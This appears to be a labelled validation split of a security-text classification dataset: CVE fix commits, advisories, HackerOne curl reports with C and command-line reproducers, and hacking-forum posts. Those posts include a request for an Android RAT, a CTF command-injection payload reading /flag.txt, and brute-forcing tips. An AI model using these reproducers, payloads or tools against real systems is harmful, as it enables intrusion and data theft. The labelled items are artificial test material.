+{"id": "45c01c0bfe288f87c5a2", "text": "[Expected Behavior Violation] CVE-2023-28322: more POST-after-PUT confusion\n\n## Summary:\nCVE-2022-32221 fixes is insufficient.\nIn CVE-2022-32221, only CURLOPT_POST was corrected.\nHowever, CURLOPT_POST is not necessarily used when sending data with the POST method.\nCURLOPT_POST is not used in the CURLOPT_POSTFIELDS usage example on the official website.\n```\nCURL *curl = curl_easy_init();\nif(curl) {\n const char *data = \"data to send\";\n \n curl_easy_setopt(curl, CURLOPT_URL, \"https://example.com\");\n \n /* size of the POST data */\n curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE, 12L);\n \n /* pass in a pointer to the data - libcurl will not copy */\n curl_easy_setopt(curl, CURLOPT_POSTFIELDS, data);\n \n curl_easy_perform(curl);\n}\n```\nAlso on this page is the following statement.\n\n>Using CURLOPT_POSTFIELDS implies setting CURLOPT_POST to 1.\n\nhttps://curl.se/libcurl/c/CURLOPT_POSTFIELDS.html\n\nI think it means that some users do not use CURLOPT_POST.\nJust to be clear, CURLOPT_POSTFIELDS does not set a `FLASE` on `data->set.upload`.\n\nCURLOPT_POST is not used in the CURLOPT_MIMEPOST usage example either.\nhttps://curl.se/libcurl/c/CURLOPT_MIMEPOST.html\n\nBased on the above, I think we need to modify the following to assign `FALSE` to `data->set.upload` if we use the following.\n* CURLOPT_POSTFIELDS\n* CURLOPT_COPYPOSTFIELDS\n* CURLOPT_MIMEPOST\n\nWe could not determine the deprecated CURLOPT_HTTPPOST.\n\n## Steps To Reproduce:\nAlmost the same source as #1704017. The difference is that line 52 is commented out.\n\n```\n#include \n#include \n#include \n\ntypedef struct\n{\n char *buf;\n size_t len;\n} put_buffer;\n\nstatic size_t put_callback(char *ptr, size_t size, size_t nmemb, void *stream)\n{\n put_buffer *putdata = (put_buffer *)stream;\n size_t totalsize = size * nmemb;\n size_t tocopy = (putdata->len < totalsize) ? putdata->len : totalsize;\n memcpy(ptr, putdata->buf, tocopy);\n putdata->len -= tocopy;\n putdata->buf += tocopy;\n return tocopy;\n}\n\nint main()\n{\n CURL *curl = NULL;\n put_buffer pbuf = {};\n char *otherdata = \"This is some other data\";\n\n curl_global_init(CURL_GLOBAL_DEFAULT);\n\n curl = curl_easy_init();\n\n // PUT\n curl_easy_setopt(curl, CURLOPT_UPLOAD, 1L);\n curl_easy_setopt(curl, CURLOPT_READFUNCTION, put_callback);\n pbuf.buf = strdup(\"This is highly secret and sensitive data\");\n pbuf.len = strlen(pbuf.buf);\n curl_easy_setopt(curl, CURLOPT_READDATA, &pbuf);\n curl_easy_setopt(curl, CURLOPT_INFILESIZE, pbuf.len);\n curl_easy_setopt(curl, CURLOPT_URL, \"http://host1.com/putsecretdata\");\n curl_easy_perform(curl);\n\n // Without this line, a PUT instead of a POST will be sent below (this is a bug in libcurl)\n //curl_easy_setopt(curl, CURLOPT_UPLOAD, 0L);\n\n // Without this line, the POST below will send \"This is highly secret and sensitive data\"\n // when instead the user intended to send \"This is some other data\"\n // With this line, the program will attempt to use freed data, causing a segfault or any number\n // of potential exploits.\n //free(pbuf.buf);\n\n // POST (will be a PUT without the line just above)\n //curl_easy_setopt(curl, CURLOPT_POST, 1L);\n curl_easy_setopt(curl, CURLOPT_POSTFIELDS, otherdata);\n curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE, strlen(otherdata));\n curl_easy_setopt(curl, CURLOPT_URL, \"http://host2.com/postotherdata\");\n curl_easy_perform(curl);\n\n curl_easy_cleanup(curl);\n\n curl_global_cleanup();\n\n return 0;\n}\n```\n\n## Supporting Material/References:\n[list any additional material (e.g. screenshots, logs, etc.)]\n\n * [attachment / reference]\n\n## Impact\n\nAn attacker could potentially inject data, either from stdin or from an unintended buffer. Further, without even an active attacker, this could lead to segfaults or sensitive information being exposed to an unintended recipient.", "source": "hackerone", "timestamp": "2023-05-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "737a93f8c21c8357817d", "text": "Appreciate your help Will check for sure SpyNote! Btw I found this one and it’s work good as for now, till Android 10! GitHub - qH0sT/AndroSpy: An Android RAT that written in C# by me . To be honest I need something which work android 11 + I can even pay for it", "source": "parrotsec", "timestamp": "2022-01-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "b5b49cc437c8d26486ed", "text": "CVE: CVE-2022-21676\n\n[{'lang': 'en', 'value': 'Engine.IO is the implementation of transport-based cross-browser/cross-device bi-directional communication layer for Socket.IO. A specially crafted HTTP request can trigger an uncaught exception on the Engine.IO server, thus killing the Node.js process. This impacts all the users of the `engine.io` package starting from version `4.0.0`, including those who uses depending packages like `socket.io`. Versions prior to `4.0.0` are not impacted. A fix has been released for each major branch, namely `4.1.2` for the `4.x.x` branch, `5.2.1` for the `5.x.x` branch, and `6.1.1` for the `6.x.x` branch. There is no known workaround except upgrading to a safe version.'}]\n\nFix commit: fix: properly handle invalid data sent by a malicious websocket client\n\n**IMPORTANT SECURITY FIX**\n\nA malicious client could send a specially crafted HTTP request,\ntriggering an uncaught exception and killing the Node.js process:\n\n> RangeError: Invalid WebSocket frame: RSV2 and RSV3 must be clear\n> at Receiver.getInfo (/.../node_modules/ws/lib/receiver.js:176:14)\n> at Receiver.startLoop (/.../node_modules/ws/lib/receiver.js:136:22)\n> at Receiver._write (/.../node_modules/ws/lib/receiver.js:83:10)\n> at writeOrBuffer (internal/streams/writable.js:358:12)\n\nThis bug was introduced by [1], included in `engine.io@4.0.0`, so\nprevious releases are not impacted.\n\n[1]: https://github.com/socketio/engine.io/commit/f3c291fa613a9d50c924d74293035737fdace4f2\n\nThanks to Marcus Wejderot from Mevisio for the responsible disclosure.", "source": "cvefixes", "timestamp": "2022-01-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "a577f5406ccb37d93eb6", "text": "Hack The Box Academy - FOOTPRINTING - DNS enumeration\n\nHello together, right now I’m stuck at in the FOOTPRINTING module of Hack The Box Academy in the DNS enumeration section. I’m stuck at the following question: “What is the FQDN of the host where the last octet ends with “x.x.x.203”?” I already used all the big subdomain lists from the SecLists directory to enumerate the subdomains but i did not find the ip address which ends with .203. I use dnsenum for the DNS enumeration. Can someone please give me some hints or point me to correct wordlist which can be used to find the correct ip? Best regards", "source": "hackthebox", "timestamp": "2022-01-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "d63286b2b6a0f756d558", "text": "CVE: CVE-2022-24976\n\n[{'lang': 'en', 'value': 'Atheme IRC Services before 7.2.12, when used in conjunction with InspIRCd, allows authentication bypass by ending an IRC handshake at a certain point during a challenge-response login sequence.'}]\n\nFix commit: saslserv/main: Track EID we're pending login to\n\nThe existing model does not remember that we've sent a SVSLOGIN for a\ngiven SASL session, and simply assumes that if a client is introduced\nwith a SASL session open, that session must have succeeded. The security\nof this approach requires ircd to implicitly abort SASL sessions on\nclient registration.\n\nThis also means that if a client successfully authenticates and then\ndoes something else its pending login is forgotten about, even though a\nSVSLOGIN has been sent for it, and the ircd is going to think it's\nlogged in.\n\nThis change removes the dependency on ircd's state machine by keeping\nexplicit track of the pending login, i.e. the one we've most recently\nsent a SVSLOGIN for. The next commit will ensure that a client abort\n(even an implicit one) doesn't blow that information away.", "source": "cvefixes", "timestamp": "2022-02-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "95d6cb39fee485f930d6", "text": "CVE: CVE-2021-45936\n\n[{'lang': 'en', 'value': 'wolfSSL wolfMQTT 1.9 has a heap-based buffer overflow in MqttDecode_Disconnect (called from MqttClient_DecodePacket and MqttClient_WaitType).'}]\n\nFix commit: Fix wolfmqtt-fuzzer: Null-dereference WRITE in MqttProps_Free", "source": "cvefixes", "timestamp": "2022-01-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "537fdf25325da58786ff", "text": "i tried with: bash (base64) and encoded spaces and slashes which contain after decode cat /flag.txt and all I get after putting this payload after to= or from= in burp image 806×321 17.3 KB and try cp and mv and don’t have results but malicious code denied I will appreciate your help", "source": "hackthebox", "timestamp": "2023-12-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "7b1d9fee5c8f2f2267b8", "text": "I need some help, to making the wordlist of Harry. Do I need to know a lot about of the harry potter movies/books to generate the right wordlist? Or not? Do I need use the “interactive” mode of cupp for generate the right wordlist? Becuase I don’t know much about Harry Potter and I’m stuck in the wordlist, I can’t get a wordlist with 13k line of length.", "source": "hackthebox", "timestamp": "2022-01-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "89fb348d4f8467e6fa9d", "text": "Cross-site Scripting in Jenkins Filesystem List Parameter Plugin\n\n[Severity: HIGH]\n\nJenkins Filesystem List Parameter Plugin 0.0.7 and earlier does not escape the name and description of File system objects list parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.\n\nExploitation of this vulnerability requires that parameters are listed on another page, like the \\\"Build With Parameters\\\" and \\\"Parameters\\\" pages provided by Jenkins (core), and that those pages are not hardened to prevent exploitation. Jenkins (core) has prevented exploitation of vulnerabilities of this kind on the \\\"Build With Parameters\\\" and \\\"Parameters\\\" pages since 2.44 and LTS 2.32.2 as part of the [SECURITY-353 / CVE-2017-2601](https://www.jenkins.io/security/advisory/2017-02-01/#persisted-cross-site-scripting-vulnerability-in-parameter-names-and-descriptions) fix. Additionally, several plugins have previously been updated to list parameters in a way that prevents exploitation by default, see [SECURITY-2617 in the 2022-04-12 security advisory for a list](https://www.jenkins.io/security/advisory/2022-04-12/#SECURITY-2617).", "source": "github_advisory", "timestamp": "2022-06-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "64964d59c175c2b4ae20", "text": "[Code Injection] CVE-2022-21831: Possible code injection vulnerability in Rails / Active Storage\n\nOriginal report: https://hackerone.com/reports/1154034\nRails advisory: https://discuss.rubyonrails.org/t/cve-2022-21831-possible-code-injection-vulnerability-in-rails-active-storage/80199\nBlogpost: https://blog.convisoappsec.com/en/cve-2022-21831-overview-of-the-security-issues-we-found-in-railss-image-processing-api/\n\nIf the report is eligible for a bounty, please split it equally between me and @rsilva, if possible.\n\n## Impact\n\nVulnerable code patterns could allow the attacker to achieve RCE.", "source": "hackerone", "timestamp": "2022-09-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "bf4ea2b7d3e5973b1db4", "text": "Nmap-cheat-sheet\n\nA very nice help using nmap. StationX – 1 May 20 Nmap Cheat Sheet Example IDS Evasion command", "source": "hackersploit", "timestamp": "2022-04-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "8823ae1033c2f8ecc509", "text": "the challenge says: We are given the IP address of an online academy but have no further information about their website. As the first step of conducting a Penetration Testing engagement, we have to determine whether any weak credentials are used across the website and other login services. Look beyond just default/common passwords. Use the skills learned in this module to gather information about employees we identified to create custom wordlists to attack their accounts. Attack the web application and submit two flags using the skills we covered in the module sections and submit them to complete this module. How will I know that they talk about Harry Potter, is that I have a crystal ball, These reots should improve the context,I know it’s about Harry because I’ve read it on the forum but I don’t know when it would have occurred to me that it was about Howards Academy", "source": "hackthebox", "timestamp": "2022-01-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "e7e69f4b1c212eef8ee5", "text": "GREENIE seems to be the key, and I agree that understanding it is crucial. If you’re hitting a “An error occurred” message when running the EXE, there might be something you’re missing in the setup. Regarding endianness, it’s a bit tricky. Little Endian can affect how data is stored and read in memory, but its direct impact on the software might not always be obvious. Try examining the code closely to see if it’s manipulating data in a way that relates to endianness. For more guidance, I’d suggest checking out some malware analysis writeups . These can provide valuable insights into how others have approached similar challenges.", "source": "hackthebox", "timestamp": "2023-10-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "9befa5492558ef189aec", "text": "greetings people, help me please what password word-list I should use? there is tons of it", "source": "hackthebox", "timestamp": "2023-02-07", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "12887d7238cd959ba6ad", "text": "Hey moron. I should know better then to click links but your link to porn is just fucked up.", "source": "parrotsec", "timestamp": "2023-01-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "a7de5450be6aabec6249", "text": "CVE: CVE-2022-0937\n\n[{'lang': 'en', 'value': 'Stored xss in showdoc through file upload in GitHub repository star7th/showdoc prior to 2.10.4.'}]\n\nFix commit: file upload bug", "source": "cvefixes", "timestamp": "2022-03-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "e7c56ffa3c1100f4e148", "text": "[Improper Certificate Validation] CVE-2023-28321: IDN wildcard match\n\n## Summary:\ncurl /libcurl uses wildcards for validation during TLS communication, even if the hostname is an IDN.\nEven if wildcards are present in the CN/SAN of the certificate, they must not be used to match if the hostname is an IDN.\nThis is described in [RFC-6125, section 6.4.3.][RFC]\n[RFC]: https://datatracker.ietf.org/doc/html/rfc6125#section-6.4.3\nYou probably know that.\nHowever, there was a problem with the implementation.\n`lib/vtls/hostcheck.c` in the function 'hostmatch' on lines 100-106.\n\n```\n /* We require at least 2 dots in the pattern to avoid too wide wildcard\n match. */\n pattern_label_end = memchr(pattern, '.', patternlen);\n if(!pattern_label_end ||\n (memrchr(pattern, '.', patternlen) == pattern_label_end) ||\n strncasecompare(pattern, \"xn--\", 4))\n return pmatch(hostname, hostlen, pattern, patternlen);\n```\nI think `strncasecompare(pattern, \"xn--\", 4))` is `strncasecompare(hostname, \"xn--\", 4))`.\n`pattern` is a value that contains wildcards because it is CN/SAN.\nIn other words, it will not match \"xn--\" because it will be a string containing wildcards.\n\n## Steps To Reproduce:\n 1. Create a wildcard certificate.As an example, attach a certificate and private key with CN value of `x*.example.local`. {F2298301} {F2298300}\n 2. `openssl s_server -accept 443 -cert server.crt -key server.key -www`\n 3. Modify hosts so that the name resolution result of `xn--l8j.example.local‘ is the IP of your machine in order to perform the test in the local environment.\n4. `curl https://%E3%81%82.example.local --cacert server.crt`\n\nWhen the above is executed, the communication succeeds even though it should result in a validation error.\n\n## Impact\n\nImproper Validation of Certificate with Host Mismatch.", "source": "hackerone", "timestamp": "2023-05-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "88e0d5f7408167aab11b", "text": "CVE: CVE-2022-29180\n\n[{'lang': 'en', 'value': \"A vulnerability in which attackers could forge HTTP requests to manipulate the `charm` data directory to access or delete anything on the server. This has been patched and is available in release [v0.12.1](https://github.com/charmbracelet/charm/releases/tag/v0.12.1). We recommend that all users running self-hosted `charm` instances update immediately. This vulnerability was found in-house and we haven't been notified of any potential exploiters. ### Additional notes * Encrypted user data uploaded to the Charm server is safe as Charm servers cannot decrypt user data. This includes filenames, paths, and all key-value data. * Users running the official Charm [Docker images](https://github.com/charmbracelet/charm/blob/main/docker.md) are at minimal risk because the exploit is limited to the containerized filesystem.\"}]\n\nFix commit: fix: clean path before accessing file store", "source": "cvefixes", "timestamp": "2022-05-07", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "17f53a1bb0f1e963ea1a", "text": "CVE: CVE-2022-24959\n\n[{'lang': 'en', 'value': 'An issue was discovered in the Linux kernel before 5.16.5. There is a memory leak in yam_siocdevprivate in drivers/net/hamradio/yam.c.'}]\n\nFix commit: yam: fix a memory leak in yam_siocdevprivate()\n\nym needs to be free when ym->cmd != SIOCYAMSMCS.\n\nFixes: 0781168e23a2 (\"yam: fix a missing-check bug\")\nSigned-off-by: Hangyu Hua \nSigned-off-by: David S. Miller ", "source": "cvefixes", "timestamp": "2022-02-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "1cf1040ae5e4b879f032", "text": "never mind, i found it: ^ (caret) means “the beginning of the line”. So “^a” means find a line starting with an “a”.", "source": "hackthebox", "timestamp": "2023-12-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "e7c23792b5c65d79687f", "text": "Network manager service \n\nimage 3024×4032 3.8 MB After airmon kill I cannot enable networking I ve update but every time it says network manager service could not be found", "source": "parrotsec", "timestamp": "2023-07-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "9a4d326993c00e082e5c", "text": "this site here has a helpful pathway Free Ethical Hacking Tutorials for Beginners [Learn How to Hack]", "source": "parrotsec", "timestamp": "2023-09-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "e63937612958ce707fb8", "text": "CVE: CVE-2022-0527\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository chatwoot/chatwoot prior to 2.2.0.'}]\n\nFix commit: fix: Ongoing campaign URL validation (#3890)", "source": "cvefixes", "timestamp": "2022-02-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "639e3ac2e3e7ca0edf03", "text": "Should I install windows on my laptop, or should I start with kali immediately?", "source": "hackersploit", "timestamp": "2022-05-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "dc0fc7d1a728bdffbb80", "text": "Hi, I also have a question. I created a userlist based on Harry Potter with the username_anarchy tool. I created a pass list based on the name I got in the previous exercise using cupp. Parameters also set to correct and still bruteforcing lasts about an hour and does not give a positive result. What am I doing wrong? Edit: i found solution of my problem. Little advice, when you generate list in cupp, remember only Name, special characters and 1337 is Yes, other, just hit Enter.", "source": "hackthebox", "timestamp": "2023-08-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "ca5f8eecc07a232d3561", "text": "CVE: CVE-2021-3602\n\n[{'lang': 'en', 'value': 'An information disclosure flaw was found in Buildah, when building containers using chroot isolation. Running processes in container builds (e.g. Dockerfile RUN commands) can access environment variables from parent and grandparent processes. When run in a container in a CI/CD environment, environment variables may include sensitive information that was shared with the container in order to be used only by Buildah itself (e.g. container registry credentials).'}]\n\nFix commit: chroot: fix environment value leakage to intermediate processes\n\nBlake Burkhart reports that when running processes using \"chroot\"\nisolation, the process being run can examine the environment of its\nimmediate parent and grandparent processes (CVE-2021-3602).\n\nWhen run in a container in a CI/CD environment, the environment may\ninclude sensitive information which was shared with the container in\norder to be used only by buildah itself. The command being executed is\nable to read such information.\n\nThis patch reduces the set of environment variables passed to these\nintermediate processes, from all variables to the one which is used to\ncontrol the level of debug logging. It also corrects a misleading debug\nmessage and expands the description of chroot isolation in man pages.\n\nSigned-off-by: Nalin Dahyabhai ", "source": "cvefixes", "timestamp": "2022-03-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "1f73f1152ca92b21a51e", "text": "CVE: CVE-2022-31139\n\n[{'lang': 'en', 'value': \"UnsafeAccessor (UA) is a bridge to access jdk.internal.misc.Unsafe & sun.misc.Unsafe. Normally, if UA is loaded as a named module, the internal data of UA is protected by JVM and others can only access UA via UA's standard API. The main application can set up `SecurityCheck.AccessLimiter` for UA to limit access to UA. Starting with version 1.4.0 and prior to version 1.7.0, when `SecurityCheck.AccessLimiter` is set up, untrusted code can access UA without limitation, even when UA is loaded as a named module. This issue does not affect those for whom `SecurityCheck.AccessLimiter` is not set up. Version 1.7.0 contains a patch.\"}]\n\nFix commit: Fix UnsafeAccess perm checking", "source": "cvefixes", "timestamp": "2022-07-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "bc9efa05117564fd1a90", "text": "android rooting with parrot os\n\nOk here goes anyone can advised on unlocking bootloader and rooting a andriod on the os", "source": "parrotsec", "timestamp": "2023-09-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "bdc897877ce955dfc099", "text": "I will say for the second question of the service login in the skills assesment where it asks you to find the other user and brute force their password, hydra took about 5 minutes to complete. I thought I was doing something wrong because it was taking a little while but it should work.", "source": "hackthebox", "timestamp": "2022-02-21", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "c62d0d2ec6b574a0bac6", "text": "CVE: CVE-2022-31042\n\n[{'lang': 'en', 'value': 'Guzzle is an open source PHP HTTP client. In affected versions the `Cookie` headers on requests are sensitive information. On making a request using the `https` scheme to a server which responds with a redirect to a URI with the `http` scheme, or on making a request to a server which responds with a redirect to a a URI to a different host, we should not forward the `Cookie` header on. Prior to this fix, only cookies that were managed by our cookie middleware would be safely removed, and any `Cookie` header manually added to the initial request would not be stripped. We now always strip it, and allow the cookie middleware to re-add any cookies that it deems should be there. Affected Guzzle 7 users should upgrade to Guzzle 7.4.4 as soon as possible. Affected users using any earlier series of Guzzle should upgrade to Guzzle 6.5.7 or 7.4.4. Users unable to upgrade may consider an alternative approach to use your own redirect middleware, rather than ours. If you do not require or expect redirects to be followed, one should simply disable redirects all together.'}]\n\nFix commit: Release 7.4.4 (#3023)", "source": "cvefixes", "timestamp": "2022-06-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "08e19b8132b08acc4623", "text": "CVE: CVE-2022-21666\n\n[{'lang': 'en', 'value': 'Useful Simple Open-Source CMS (USOC) is a content management system (CMS) for programmers. Versions prior to Pb2.4Bfx3 allowed Sql injection in usersearch.php only for users with administrative privileges. Users should replace the file `admin/pages/useredit.php` with a newer version. USOC version Pb2.4Bfx3 contains a fixed version of `admin/pages/useredit.php`.'}]\n\nFix commit: Update usersearch.php", "source": "cvefixes", "timestamp": "2022-01-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "ebcfae413e0451898d91", "text": "Plaintext storage of sensitive data in Rancher API and cluster.management.cattle.io objects\n\n[Severity: HIGH]\n\n### Impact\n\nThis issue affects Rancher versions from 2.5.0 up to and including 2.5.16, from 2.6.0 up to and including 2.6.9 and 2.7.0. It was discovered that the security advisory CVE-2021-36782 (GHSA-g7j7-h4q8-8w2f), previously released by Rancher, missed addressing some sensitive fields, secret tokens, encryption keys, and SSH keys that were still being stored in plaintext directly on Kubernetes objects like `Clusters`.\n\nThe exposed credentials are visible in Rancher to authenticated `Cluster Owners`, `Cluster Members`, `Project Owners` and `Project Members` of that cluster on the endpoints:\n\n- `/v1/management.cattle.io.cluster`\n- `/v1/management.cattle.io.clustertemplaterevisions`\n\nThe remaining sensitive fields are now stripped from `Clusters` and other objects and moved to a `Secret` before the object is stored. The `Secret` is retrieved when the credential is needed. For objects that existed before this security fix, a one-time migration happens on startup.\n\nThe fields that have been addressed by this security fix are:\n\n- `Cluster.Spec.RancherKubernetesEngineConfig.Services.KubeAPI.SecretsEncryptionConfig.CustomConfig.Providers[].AESGCM.Keys[].Secret`\n- `Cluster.Spec.RancherKubernetesEngineConfig.Services.KubeAPI.SecretsEncryptionConfig.CustomConfig.Providers[].AESCBC.Keys[].Secret`\n- `Cluster.Spec.RancherKubernetesEngineConfig.Services.KubeAPI.SecretsEncryptionConfig.CustomConfig.Providers[].SecretboxConfiguration.Keys[].Secret`\n- `Cluster.Spec.RancherKubernetesEngineConfig.Services.Kubelet.ExtraEnv` when containing the `AWS_SECRET_ACCESS_KEY` environment variable\n- `Cluster.Spec.RancherKubernetesEngineConfig.BastionHost.SSHKey`\n- `Cluster.Spec.RancherKubernetesEngineConfig.PrivateRegistries[].ECRCredentialPlugin.AwsSecretAccessKey`\n- `Cluster.Spec.RancherKubernetesEngineConfig.PrivateRegistries[].ECRCredentialPlugin.AwsSessionToken`\n- `Cluster.Spec.RancherKubernetesEngineConfig.Network.AciNetworkProvider.ApicUserKey`\n- `Cluster.Spec.RancherKubernetesEngineConfig.Network.AciNetworkProvider.KafkaClientKey`\n- `Cluster.Spec.RancherKubernetesEngineConfig.Network.AciNetworkProvider.Token`\n\n**Important:**\n\n- For the exposure of credentials not related to Rancher, the final impact severity for confidentiality, integrity and availability is dependent on the permissions the leaked credentials have on their services.\n\n- It is recommended to review for potentially leaked credentials in this scenario and to change them if deemed necessary.\n\n### Workarounds\n\nThere is no direct mitigation besides updating Rancher to a patched version.\n\n### Patches\n\nPatched versions include releases 2.5.17, 2.6.10, 2.7.1 and later versions.\n\nAfter upgrading to a patched version, it is important to check for the `ACISecretsMigrated` and `RKESecretsMigrated` conditions on `Clusters` and `ClusterTemplateRevisions` to confirm when secrets have been fully migrated off of those objects, and the objects scoped within them.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n* Reach out to [SUSE Rancher Security team](https://github.com/rancher/rancher/security/policy) for security related inquiries.\n* Open an issue in [Rancher](https://github.com/rancher/rancher/issues/new/choose) repository.\n* Verify our [support matrix](https://www.suse.com/suse-rancher/support-matrix/all-supported-versions/) and [product support lifecycle](https://www.suse.com/lifecycle/).", "source": "github_advisory", "timestamp": "2023-01-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "97b564237064bd67dec0", "text": "Well, in my opinion, a compensation plan based on results can be an effective way to motivate individuals and achieve specific objectives. Still, it requires careful consideration of the goals, performance metrics, and potential downsides. It's important to ensure that the objectives are achievable, that the measurement of individual performance is fair and accurate, and that individuals are not penalized for factors beyond their control. Ultimately, it's important to weigh the risks and benefits of this approach before making a decision. Hope you are clear now. Thanks", "source": "go4expert", "timestamp": "2023-03-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "d18393d9663fa391b0f1", "text": "CVE: CVE-2022-0990\n\n[{'lang': 'en', 'value': 'Server-Side Request Forgery (SSRF) in GitHub repository janeczku/calibre-web prior to 0.6.18.'}]\n\nFix commit: Better epub cover parsing with multiple cover-image items\nCode cosmetics\nrenamed variables\nrefactored xml page generation\nrefactored prepare author", "source": "cvefixes", "timestamp": "2022-04-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "f941e88231494a99e69d", "text": "CVE: CVE-2022-25299\n\n[{'lang': 'en', 'value': 'This affects the package cesanta/mongoose before 7.6. The unsafe handling of file names during upload using mg_http_upload() method may enable attackers to write files to arbitrary locations outside the designated target folder.'}]\n\nFix commit: Protect against the directory traversal in mg_upload()", "source": "cvefixes", "timestamp": "2022-02-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "c2db076d535999f45ba8", "text": "For the first step you must use the information that you suppose, first use cupp to get a password list, remember the filters of this list that you learned in the previous lessons (sed …), after that, as the exercise recommend use the tool username-anarchy to create a list of usernames. With these tips you should pass the first parth of the exercise. Best, Amaro", "source": "hackthebox", "timestamp": "2022-01-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "fd5d94259358bb360ec1", "text": "CVE: CVE-2021-4216\n\n[{'lang': 'en', 'value': 'A Floating point exception (division-by-zero) flaw was found in Mupdf for zero width pages in muraster.c. It is fixed in Mupdf-1.20.0-rc1 upstream.'}]\n\nFix commit: Bug 704834: Fix division by zero for zero width pages in muraster.", "source": "cvefixes", "timestamp": "2022-08-26", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "057dcf41e4433e712fb7", "text": "Anyone else struggling with this, remember the hint from the first question: Use options “–batch --dump” to automatically dump all data. This was a deal breaker for me", "source": "hackthebox", "timestamp": "2022-02-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "09c6417ca6b58b647bb8", "text": "I also stuck with Elasticity. I have terminal as ***x, I see files from ***x and ***y, but not sure if I understand what to do with them yet. But this will be the next step. Right now I’m trying to solve Elasticity part and I have timeouts from both ports. I tried IPv4 and IPv6, different hostnames and so on. I just can’t use REST API for some reason. Maybe I just don’t see something. Any hint is appreciated. P.S. I start suspecting it’s not about ports but about encrypted files and I need to look into them.", "source": "hackthebox", "timestamp": "2023-02-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "db2f9bd3bb673df7d35a", "text": "GeoServer RCE due to improper control of generation of code in jai-ext`Jiffle` map algebra language\n\n[Severity: CRITICAL]\n\nGeoServer 2, in some configurations, allows remote attackers to execute arbitrary code via `java.lang.Runtime.getRuntime().exec` in `wps:LiteralData` within a `wps:Execute` request, as exploited in the wild in June 2023.\n\n## RCE in Jiffle\n\nThe Jiffle map algebra language, provided by jai-ext, allows efficiently execute map algebra over large images. A vulnerability [CVE-2022-24816](https://nvd.nist.gov/vuln/detail/CVE-2022-24816) has been recently found in Jiffle, that allows a Code Injection to be performed by properly crafting a Jiffle invocation.\n\nIn the case of GeoServer, the injection can be performed from a remote request.\n\n## Assessment\n\nGeoTools includes the Jiffle language as part of the `gt-process-raster-` module, applications using it should check whether it’s possible to provide a Jiffle script from remote, and if so, upgrade or remove the functionality (see also the GeoServer mitigation, below).\n\nThe issue is of particular interest for GeoServer users, as GeoServer embeds Jiffle in the base WAR package. Jiffle is available as a OGC function, for usage in SLD rendering transformations.\n\nThis allows for a Remote Code Execution in properly crafted OGC requests, as well as from the administration console, when editing SLD files.\n\n## Mitigations\n\nIn case you cannot upgrade at once, then the following mitigation is strongly recommended:\n\n1. Stop GeoServer\n2. Open the war file, get into `WEB-INF/lib` and remove the `janino-.jar`\n3. Restart GeoServer.\n\nThis effectively removes the Jiffle ability to compile scripts in Java code, from any of the potential attack vectors (Janino is the library used to turn the Java code generated from the Jiffle script, into executable bytecode).\n\nGeoServer should still work properly after the removal, but any attempt to use Jiffle will result in an exception.", "source": "github_advisory", "timestamp": "2023-06-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
